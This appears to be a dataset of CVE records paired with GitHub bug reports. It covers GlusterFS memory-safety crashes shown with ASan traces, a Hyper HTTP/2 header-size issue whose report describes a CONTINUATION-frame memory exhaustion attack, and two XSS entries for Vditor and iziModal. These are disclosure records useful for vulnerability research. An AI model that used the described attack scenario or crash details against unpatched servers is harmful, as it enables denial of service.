#11 0x555555584675 in mgmt_getspec_cbk /root/glusterfs/glusterfsd/src/glusterfsd-mgmt.c:2444
#12 0x7ffff721ffca in rpc_clnt_handle_reply /root/glusterfs/rpc/rpc-lib/src/rpc-clnt.c:723
#13 0x7ffff721ffca in rpc_clnt_notify /root/glusterfs/rpc/rpc-lib/src/rpc-clnt.c:890
#14 0x7ffff7219983 in rpc_transport_notify /root/glusterfs/rpc/rpc-lib/src/rpc-transport.c:521
#15 0x7ffff018a5a6 in socket_event_poll_in_async /root/glusterfs/rpc/rpc-transport/socket/src/socket.c:2358
#16 0x7ffff019ab39 in gf_async ../../../../libglusterfs/src/glusterfs/async.h:187
#17 0x7ffff019ab39 in socket_event_poll_in /root/glusterfs/rpc/rpc-transport/socket/src/socket.c:2399
#18 0x7ffff019ab39 in socket_event_handler /root/glusterfs/rpc/rpc-transport/socket/src/socket.c:2790
#19 0x7ffff019ab39 in socket_event_handler /root/glusterfs/rpc/rpc-transport/socket/src/socket.c:2710
#20 0x7ffff73fa6c0 in event_dispatch_epoll_handler /root/glusterfs/libglusterfs/src/event-epoll.c:631
#21 0x7ffff73fa6c0 in event_dispatch_epoll_worker /root/glusterfs/libglusterfs/src/event-epoll.c:742
#22 0x7ffff71bf608 in start_thread /build/glibc-YYA7BZ/glibc-2.31/nptl/pthread_create.c:477
Thread T7 created by T0 here:
#0 0x7ffff75c7805 in pthread_create (/lib/x86_64-linux-gnu/libasan.so.5+0x3a805)
#1 0x7ffff72f8b97 in gf_thread_vcreate /root/glusterfs/libglusterfs/src/common-utils.c:3261
#2 0x7ffff730a28d in gf_thread_create /root/glusterfs/libglusterfs/src/common-utils.c:3284
#3 0x7ffff73f8af2 in event_dispatch_epoll /root/glusterfs/libglusterfs/src/event-epoll.c:797
#4 0x7ffff7353f89 in gf_event_dispatch /root/glusterfs/libglusterfs/src/event.c:115
#5 0x7ffff7461b7f in gf_io_main /root/glusterfs/libglusterfs/src/gf-io.c:431
#6 0x7ffff7461b7f in gf_io_run /root/glusterfs/libglusterfs/src/gf-io.c:516
#7 0x55555556c37a in main /root/glusterfs/glusterfsd/src/glusterfsd.c:2774
#8 0x7ffff6fe90b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
SUMMARY: AddressSanitizer: heap-use-after-free /root/glusterfs/xlators/cluster/dht/src/dht-common.c:3944 in dht_setx
attr_mds_cbk
Shadow bytes around the buggy address:
0x0c4280005a30: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c4280005a40: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c4280005a50: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c4280005a60: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c4280005a70: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=>0x0c4280005a80: fd fd fd fd fd fd[fd]fd fd fd fd fd fd fd fd fd
0x0c4280005a90: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c4280005aa0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c4280005ab0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c4280005ac0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c4280005ad0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==326==ABORTING
```
**Expected results:**
Shouldn't crash.
**Mandatory info:**
**- The output of the `gluster volume info` command**:
```bash
Volume Name: test_volume
Type: Distribute
Volume ID: dc8b32ae-2e0d-4ff9-af1e-bbe3dcf9eb9d
Status: Started
Snapshot Count: 0
Number of Bricks: 2
Transport-type: tcp
Bricks:
Brick1: 192.168.0.30:/root/glusterfs-server
Brick2: 192.168.0.31:/root/glusterfs-server
Options Reconfigured:
storage.fips-mode-rchecksum: on
transport.address-family: inet
nfs.disable: on
```
**- The output of the `gluster volume status` command**:
```bash
Status of volume: test_volume
Gluster process TCP Port RDMA Port Online Pid
------------------------------------------------------------------------------
Brick 192.168.0.30:/root/glusterfs-server 60519 0 Y 328
Brick 192.168.0.31:/root/glusterfs-server 52119 0 Y 399
Task Status of Volume test_volume
------------------------------------------------------------------------------
There are no active volume tasks
```
**- The output of the `gluster volume heal` command**:
```bash
Launching heal operation to perform index self heal on volume test_volume has been unsuccessful:
Self-heal-daemon is disabled. Heal will not be triggered on volume test_volume
```
**- Provide logs present on following locations of client and server nodes**
/var/log/glusterfs/root-glusterfs-client.log
```bash
[2022-08-22 14:19:40.656407 +0000] I [MSGID: 114057] [client-handshake.c:871:select_server_supported_programs] 0-tes
t_volume-client-0: Using Program [{Program-name=GlusterFS 4.x v1}, {Num=1298437}, {Version=400}]
[2022-08-22 14:19:40.656570 +0000] I [MSGID: 114057] [client-handshake.c:871:select_server_supported_programs] 0-tes
t_volume-client-1: Using Program [{Program-name=GlusterFS 4.x v1}, {Num=1298437}, {Version=400}]
[2022-08-22 14:19:40.666962 +0000] I [MSGID: 114046] [client-handshake.c:621:client_setvolume_cbk] 0-test_volume-cli
ent-1: Connected, attached to remote volume [{conn-name=test_volume-client-1}, {remote_subvol=/root/glusterfs-server
}]
[2022-08-22 14:19:40.666962 +0000] I [MSGID: 114046] [client-handshake.c:621:client_setvolume_cbk] 0-test_volume-cli
ent-0: Connected, attached to remote volume [{conn-name=test_volume-client-0}, {remote_subvol=/root/glusterfs-server
}]
[2022-08-22 14:19:40.673626 +0000] I [fuse-bridge.c:5328:fuse_init] 0-glusterfs-fuse: FUSE inited with protocol vers
ions: glusterfs 7.24 kernel 7.34
[2022-08-22 14:19:40.673711 +0000] I [fuse-bridge.c:5960:fuse_graph_sync] 0-fuse: switched to graph 0
[2022-08-22 14:19:40.679061 +0000] I [MSGID: 109060] [dht-layout.c:562:dht_layout_normalize] 0-test_volume-dht: Foun
d anomalies [{path=/}, {gfid=00000000-0000-0000-0000-000000000001}, {holes=1}, {overlaps=0}]
[2022-08-22 14:20:36.659851 +0000] W [socket.c:751:__socket_rwv] 0-test_volume-client-1: readv on 192.168.0.31:54826
failed (No data available)
[2022-08-22 14:20:36.659985 +0000] I [MSGID: 114018] [client.c:2242:client_rpc_notify] 0-test_volume-client-1: disco
nnected from client, process will keep trying to connect glusterd until brick's port is available [{conn-name=test_v
olume-client-1}]
[2022-08-22 14:20:53.872093 +0000] W [MSGID: 114031] [client-rpc-fops_v2.c:2561:client4_0_lookup_cbk] 0-test_volume-
client-1: remote operation failed. [{path=/}, {gfid=00000000-0000-0000-0000-000000000001}, {errno=107}, {error=Trans
port endpoint is not connected}]
[2022-08-22 14:20:53.872291 +0000] W [MSGID: 114029] [client-rpc-fops_v2.c:2991:client4_0_lookup] 0-test_volume-clie
nt-1: failed to send the fop []
[2022-08-22 14:20:53.874557 +0000] W [MSGID: 114031] [client-rpc-fops_v2.c:2561:client4_0_lookup_cbk] 0-test_volume-
client-1: remote operation failed. [{path=/testdir}, {gfid=9bcc505b-c52c-4f88-925f-62a64d5e432a}, {errno=107}, {erro
r=Transport endpoint is not connected}]
[2022-08-22 14:20:53.874752 +0000] W [MSGID: 114029] [client-rpc-fops_v2.c:2991:client4_0_lookup] 0-test_volume-clie
nt-1: failed to send the fop []
[2022-08-22 14:20:53.877789 +0000] W [MSGID: 114031] [client-rpc-fops_v2.c:1057:client4_0_removexattr_cbk] 0-test_vo
lume-client-1: remote operation failed. [{errno=107}, {error=Transport endpoint is not connected}]
[2022-08-22 14:20:53.877958 +0000] W [MSGID: 114029] [client-rpc-fops_v2.c:4485:client4_0_removexattr] 0-test_volume
-client-1: failed to send the fop []
```
**- Is there any crash ? Provide the backtrace and coredump**
**Additional info:**
**- The operating system / glusterfs version**:
Latest version: 37f6ced36792e42b98160f9cfffdbf307421e155
**Note: Please hide any confidential data which you don't want to share in public like IP address, file name, hostname or any other configuration**
| AddressSanitizer: heap-use-after-free | https://api.github.com/repos/gluster/glusterfs/issues/3732/comments | 17 | 2022-08-22T15:00:21Z | 2025-01-15T13:03:16Z | https://github.com/gluster/glusterfs/issues/3732 | 1,346,559,275 | 3,732 | 4,751 |
CVE-2023-26253 | 2023-02-21T02:15:10.367 | In Gluster GlusterFS 11.0, there is an xlators/mount/fuse/src/fuse-bridge.c notify stack-based buffer over-read. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/gluster/glusterfs/issues/3954"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UE6K2DXP4QZVKP32Z7BSYDSRBL4H7JSE/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/gluster/glusterfs/issues/3954"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UE6K2DXP4QZVKP32Z7BSYDSRBL4H7JSE/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gluster:glusterfs:11.0:*:*:*:*:*:*:*",
"matchCriteriaId": "7B3E49EE-8F33-469E-94E9-A5C7EE296D2F",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"125"
] | 125 | https://github.com/gluster/glusterfs/issues/3954 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"gluster",
"glusterfs"
] | <!-- Please use this template while reporting an issue, providing as much information as possible. Failure to do so may result in a delayed response. Thank you! -->
**Description of problem:**
There is a stack-buffer-overflow read in `notify()` as listed below:
```c
int
notify(xlator_t *this, int32_t event, void *data, ...)
{
int i = 0;
int32_t ret = 0;
fuse_private_t *private = NULL;
gf_boolean_t start_thread = _gf_false;
glusterfs_graph_t *graph = NULL;
struct pollfd pfd = {0};
private = this->private;
graph = data;
//stack overflow read when executing graph->id
gf_log("fuse", GF_LOG_DEBUG, "got event %d on graph %d", event,
((graph) ? graph->id : 0));
...
}
```
The bug is triggered by calling the callback function `client_cbk_inodelk_contention`. The overflowed variable `data` used in `notify` is passed from `client_cbk_inodelk_contention`. The `data` in `client_cbk_inodelk_contention` is a stack variable with the type `struct gf_upcall` as listed below. Its size is 40 bytes. However, in `notify` shown above, `data` is converted as `glusterfs_graph_t`. And `graph->id` is dereferenced, which is located at the 52-th bytes away from the beginning of graph. And thus a buffer overflow read bug is triggered.
```c
static int
client_cbk_inodelk_contention(struct rpc_clnt *rpc, void *mydata, void *data)
{
...
struct gf_upcall upcall_data = {
0,
};
...
}
```
**The exact command to reproduce the issue**:
I the key point of reproducing this bug is make the client call `client_cbk_inodelk_contention`. But I haven't figure out when this function will be called.
**- Is there any crash ? Provide the backtrace and coredump
```bash
==378==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fffefa6e234 at pc 0x7ffff2f6b5c1 bp 0x7fffefa6d300 sp 0x7fffefa6d2f0
READ of size 4 at 0x7fffefa6e234 thread T7
#0 0x7ffff2f6b5c0 in notify /root/glusterfs/xlators/mount/fuse/src/fuse-bridge.c:6538
#1 0x7ffff72e2474 in xlator_notify /root/glusterfs/libglusterfs/src/xlator.c:709
#2 0x7ffff74eff2a in default_notify /root/glusterfs/libglusterfs/src/defaults.c:3409
#3 0x7ffff72e2474 in xlator_notify /root/glusterfs/libglusterfs/src/xlator.c:709
#4 0x7ffff74efa9a in default_notify /root/glusterfs/libglusterfs/src/defaults.c:3413
#5 0x7fffeec5b34a in notify /root/glusterfs/xlators/debug/io-stats/src/io-stats.c:4332
#6 0x7ffff72e2474 in xlator_notify /root/glusterfs/libglusterfs/src/xlator.c:709
#7 0x7ffff74efa9a in default_notify /root/glusterfs/libglusterfs/src/defaults.c:3413
#8 0x7fffeec8d5e0 in notify /root/glusterfs/xlators/performance/io-threads/src/io-threads.c:1333
#9 0x7ffff72e2474 in xlator_notify /root/glusterfs/libglusterfs/src/xlator.c:709
#10 0x7ffff74efa9a in default_notify /root/glusterfs/libglusterfs/src/defaults.c:3413
#11 0x7fffeeceb4e3 in mdc_notify /root/glusterfs/xlators/performance/md-cache/src/md-cache.c:3827
#12 0x7ffff72e2474 in xlator_notify /root/glusterfs/libglusterfs/src/xlator.c:709
#13 0x7ffff74efa9a in default_notify /root/glusterfs/libglusterfs/src/defaults.c:3413
#14 0x7fffeed15973 in qr_notify /root/glusterfs/xlators/performance/quick-read/src/quick-read.c:1506
#15 0x7ffff72e2474 in xlator_notify /root/glusterfs/libglusterfs/src/xlator.c:709
#16 0x7ffff74efa9a in default_notify /root/glusterfs/libglusterfs/src/defaults.c:3413
#17 0x7ffff72e2474 in xlator_notify /root/glusterfs/libglusterfs/src/xlator.c:709
#18 0x7ffff74efa9a in default_notify /root/glusterfs/libglusterfs/src/defaults.c:3413
#19 0x7ffff72e2474 in xlator_notify /root/glusterfs/libglusterfs/src/xlator.c:709
#20 0x7ffff74efa9a in default_notify /root/glusterfs/libglusterfs/src/defaults.c:3413
#21 0x7fffeed895cf in notify ../../../../xlators/features/utime/src/utime.c:318
#22 0x7ffff72e2474 in xlator_notify /root/glusterfs/libglusterfs/src/xlator.c:709
#23 0x7ffff74efa9a in default_notify /root/glusterfs/libglusterfs/src/defaults.c:3413
#24 0x7fffeef0157f in dht_notify /root/glusterfs/xlators/cluster/dht/src/dht-common.c:11252
#25 0x7ffff72e2474 in xlator_notify /root/glusterfs/libglusterfs/src/xlator.c:709
#26 0x7ffff74efa9a in default_notify /root/glusterfs/libglusterfs/src/defaults.c:3413
#27 0x7fffef01013f in ec_notify /root/glusterfs/xlators/cluster/ec/src/ec.c:680
#28 0x7fffef010986 in notify /root/glusterfs/xlators/cluster/ec/src/ec.c:697
#29 0x7ffff72e2474 in xlator_notify /root/glusterfs/libglusterfs/src/xlator.c:709
#30 0x7ffff74efa9a in default_notify /root/glusterfs/libglusterfs/src/defaults.c:3413
#31 0x7fffef21084e in client_cbk_inodelk_contention /root/glusterfs/xlators/protocol/client/src/client-callback.c:221
#32 0x7ffff7220567 in rpc_clnt_handle_cbk /root/glusterfs/rpc/rpc-lib/src/rpc-clnt.c:676
#33 0x7ffff7220567 in rpc_clnt_notify /root/glusterfs/rpc/rpc-lib/src/rpc-clnt.c:892
#34 0x7ffff7219983 in rpc_transport_notify /root/glusterfs/rpc/rpc-lib/src/rpc-transport.c:521
#35 0x7ffff03405a6 in socket_event_poll_in_async /root/glusterfs/rpc/rpc-transport/socket/src/socket.c:2358
#36 0x7ffff0350b39 in gf_async ../../../../libglusterfs/src/glusterfs/async.h:187
#37 0x7ffff0350b39 in socket_event_poll_in /root/glusterfs/rpc/rpc-transport/socket/src/socket.c:2399
#38 0x7ffff0350b39 in socket_event_handler /root/glusterfs/rpc/rpc-transport/socket/src/socket.c:2790
#39 0x7ffff0350b39 in socket_event_handler /root/glusterfs/rpc/rpc-transport/socket/src/socket.c:2710
#40 0x7ffff73fa6c0 in event_dispatch_epoll_handler /root/glusterfs/libglusterfs/src/event-epoll.c:631
#41 0x7ffff73fa6c0 in event_dispatch_epoll_worker /root/glusterfs/libglusterfs/src/event-epoll.c:742
#42 0x7ffff71bf608 in start_thread /build/glibc-YYA7BZ/glibc-2.31/nptl/pthread_create.c:477
#43 0x7ffff70e4102 in __clone (/lib/x86_64-linux-gnu/libc.so.6+0x122102)
Address 0x7fffefa6e234 is located in stack of thread T7 at offset 100 in frame
#0 0x7fffef2101df in client_cbk_inodelk_contention /root/glusterfs/xlators/protocol/client/src/client-callback.c:183
This frame has 3 object(s):
[48, 88) 'upcall_data' (line 186) <== Memory access at offset 100 overflows this variable
[128, 224) 'proto_lc' (line 194)
[256, 1336) 'lc' (line 189)
HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
(longjmp and C++ exceptions *are* supported)
Thread T7 created by T0 here:
#0 0x7ffff75c7805 in pthread_create (/lib/x86_64-linux-gnu/libasan.so.5+0x3a805)
#1 0x7ffff72f8b97 in gf_thread_vcreate /root/glusterfs/libglusterfs/src/common-utils.c:3261
#2 0x7ffff730a28d in gf_thread_create /root/glusterfs/libglusterfs/src/common-utils.c:3284
#3 0x7ffff73f8af2 in event_dispatch_epoll /root/glusterfs/libglusterfs/src/event-epoll.c:797
#4 0x7ffff7353f89 in gf_event_dispatch /root/glusterfs/libglusterfs/src/event.c:115
#5 0x7ffff7461b7f in gf_io_main /root/glusterfs/libglusterfs/src/gf-io.c:431
#6 0x7ffff7461b7f in gf_io_run /root/glusterfs/libglusterfs/src/gf-io.c:516
#7 0x55555556c37a in main /root/glusterfs/glusterfsd/src/glusterfsd.c:2774
#8 0x7ffff6fe90b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
SUMMARY: AddressSanitizer: stack-buffer-overflow /root/glusterfs/xlators/mount/fuse/src/fuse-bridge.c:6538 in notify
Shadow bytes around the buggy address:
0x10007df45bf0: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00 00 00 f3
0x10007df45c00: f3 f3 f3 f3 00 00 00 00 00 00 00 00 00 00 00 00
0x10007df45c10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10007df45c20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10007df45c30: 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1 f1 f1
=>0x10007df45c40: 00 00 00 00 00 f2[f2]f2 f2 f2 00 00 00 00 00 00
0x10007df45c50: 00 00 00 00 00 00 f2 f2 f2 f2 00 00 00 00 00 00
0x10007df45c60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10007df45c70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10007df45c80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10007df45c90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==378==ABORTING
```
**- The operating system / glusterfs version**:
ubuntu 20.04 and glusterfs with 79154ae538f4539ccf69272b2b4736d891262781.
I might add some debug print code in it. So the trace line number might not exact the same with the version 79154ae538f4539ccf69272b2b4736d891262781
| AddressSanitizer: stack-buffer-overflow in notify at glusterfs/xlators/mount/fuse/src/fuse-bridge.c | https://api.github.com/repos/gluster/glusterfs/issues/3954/comments | 4 | 2023-01-11T12:24:01Z | 2024-01-19T02:14:58Z | https://github.com/gluster/glusterfs/issues/3954 | 1,528,945,349 | 3,954 | 4,752 |
CVE-2022-31394 | 2023-02-21T14:15:13.363 | Hyperium Hyper before 0.14.19 does not allow for customization of the max_header_list_size method in the H2 third-party software, allowing attackers to perform HTTP2 attacks. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Patch"
],
"url": "https://github.com/hyperium/hyper/compare/v0.14.18...v0.14.19"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Vendor Advisory"
],
"url": "https://github.com/hyperium/hyper/issues/2826"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Patch"
],
"url": "https://github.com/hyperium/hyper/pull/2828"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch"
],
"url": "https://github.com/hyperium/hyper/compare/v0.14.18...v0.14.19"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Vendor Advisory"
],
"url": "https://github.com/hyperium/hyper/issues/2826"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Patch"
],
"url": "https://github.com/hyperium/hyper/pull/2828"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:hyper:hyper:*:*:*:*:*:rust:*:*",
"matchCriteriaId": "0B584AC5-F309-4E62-B755-AAD46CA687BA",
"versionEndExcluding": "0.14.19",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"770"
] | 770 | https://github.com/hyperium/hyper/issues/2826 | [
"Exploit",
"Issue Tracking",
"Patch",
"Vendor Advisory"
] | github.com | [
"hyperium",
"hyper"
] | **Version**
0.14.12
**Description**
Hyper does not open the customization of the max_header_list_size method in the H2 third-party software.
The H2 interface is as follows:
``` rust
/// Sets the max size of received header frames.
///
/// This advisory setting informs a peer of the maximum size of header list
/// that the sender is prepared to accept, in octets. The value is based on
/// the uncompressed size of header fields, including the length of the name
/// and value in octets plus an overhead of 32 octets for each header field.
///
/// This setting is also used to limit the maximum amount of data that is
/// buffered to decode HEADERS frames.
///
/// # Examples
///
/// ```
/// # use tokio::io::{AsyncRead, AsyncWrite};
/// # use h2::server::*;
/// #
/// # fn doc<T: AsyncRead + AsyncWrite + Unpin>(my_io: T)
/// # -> Handshake<T>
/// # {
/// // `server_fut` is a future representing the completion of the HTTP/2.0
/// // handshake.
/// let server_fut = Builder::new()
/// .max_header_list_size(16 * 1024)
/// .handshake(my_io);
/// # server_fut
/// # }
/// #
/// # pub fn main() {}
/// ```
pub fn max_header_list_size(&mut self, max: u32) -> &mut Self {
self.settings.set_max_header_list_size(Some(max));
self
}
```
The default value of max_header_list_size in h2 is 16m.
As a result, HTTP2 attacks may occur when Hyper is used.
Attack scenario: Hyper is used as the server and continues to send continuance frames without ending. The data of each continuance frame is 10 KB. Each thread sends 1023 continuance frames, that is, about 10 MB. Multiple threads are started to send continuance frames. As a result, the memory of the service is exploded.
| Allow specifying the HTTP/2 SETTINGS_MAX_HEADER_LIST_SIZE | https://api.github.com/repos/hyperium/hyper/issues/2826/comments | 5 | 2022-05-05T13:51:14Z | 2023-02-23T10:33:46Z | https://github.com/hyperium/hyper/issues/2826 | 1,226,704,106 | 2,826 | 4,753 |
CVE-2021-32855 | 2023-02-21T15:15:11.267 | Vditor is a browser-side Markdown editor. Versions prior to 3.8.7 are vulnerable to copy-paste cross-site scripting (XSS). For this particular type of XSS, the victim needs to be fooled into copying a malicious payload into the text editor. Version 3.8.7 contains a patch for this issue. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/Vanessa219/vditor/commit/1b2382d7f8a4ee509d9245db4450d926a0b24146"
},
{
"source": "security-advisories@github.com",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/Vanessa219/vditor/issues/1085"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://securitylab.github.com/advisories/GHSL-2021-1006-vditor/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/Vanessa219/vditor/commit/1b2382d7f8a4ee509d9245db4450d926a0b24146"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/Vanessa219/vditor/issues/1085"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://securitylab.github.com/advisories/GHSL-2021-1006-vditor/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:b3log:vditor:*:*:*:*:*:*:*:*",
"matchCriteriaId": "40698112-82AE-4A10-B047-BF21C7011D86",
"versionEndExcluding": "3.8.7",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/Vanessa219/vditor/issues/1085 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"Vanessa219",
"vditor"
] | * https://github.com/Vanessa219/vditor/issues/1076 @intrigus-lgtm
* https://github.com/Vanessa219/vditor/issues/1084 @pwntester
| XSS 漏洞修复 | https://api.github.com/repos/Vanessa219/vditor/issues/1085/comments | 1 | 2021-09-21T09:56:33Z | 2021-09-21T13:43:09Z | https://github.com/Vanessa219/vditor/issues/1085 | 1,002,142,186 | 1,085 | 4,754 |
CVE-2021-32860 | 2023-02-21T15:15:11.867 | iziModal is a modal plugin with jQuery. Versions prior to 1.6.1 are vulnerable to cross-site scripting (XSS) when handling untrusted modal titles. An attacker who is able to influence the field `title` when creating a `iziModal` instance is able to supply arbitrary `html` or `javascript` code that will be rendered in the context of a user, potentially leading to `XSS`. Version 1.6.1 contains a patch for this issue | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/marcelodolza/iziModal/commit/01728ac52bac5c1b4512087dafe0ad8b091fdc9e"
},
{
"source": "security-advisories@github.com",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/marcelodolza/iziModal/issues/249"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
